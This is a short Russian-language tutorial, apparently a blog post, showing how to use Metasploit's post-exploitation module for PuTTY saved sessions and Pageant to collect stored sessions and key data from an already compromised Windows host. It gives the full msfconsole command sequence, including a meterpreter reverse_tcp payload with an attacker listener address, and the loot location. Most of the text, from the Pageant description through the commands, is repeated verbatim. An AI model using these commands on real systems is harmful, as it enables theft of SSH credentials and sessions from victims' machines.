Всем привет! В этой статье я покажу, как с помощью Metasploit получить информацию о сохраненных сессиях PuTTY на целевом хосте. Используемый мною модуль определит, запущен ли Pageant и получает ли он информацию о сохраненных сессиях из реестра и соберет все доступные данные.
Pageant - это приложение, входящее в утилиту PuTTY. Это программное обеспечение используется для хранения приватных ключей в памяти в раскодированном виде, которые используются при запросе удаленного сервера. Так же с помощью Pageant можно создавать новые подключения или подключаться к сохраненным.
Для начала необходимо получить сессию meterpreter на целевом хосте. Затем вводим команды:
> background
> use post/windows/gather/enum_putty_saved_sessions
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.0.XXX (IP of Local Host)
> set session 1
> exploit
Вся добытая информация сохранится в папке /root/.msf4/loot.
Pageant - это приложение, входящее в утилиту PuTTY. Это программное обеспечение используется для хранения приватных ключей в памяти в раскодированном виде, которые используются при запросе удаленного сервера. Так же с помощью Pageant можно создавать новые подключения или подключаться к сохраненным.
Для начала необходимо получить сессию meterpreter на целевом хосте. Затем вводим команды:
> background
> use post/windows/gather/enum_putty_saved_sessions
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.0.XXX (IP of Local Host)
> set session 1
> exploit
Вся добытая информация сохранится в папке /root/.msf4/loot.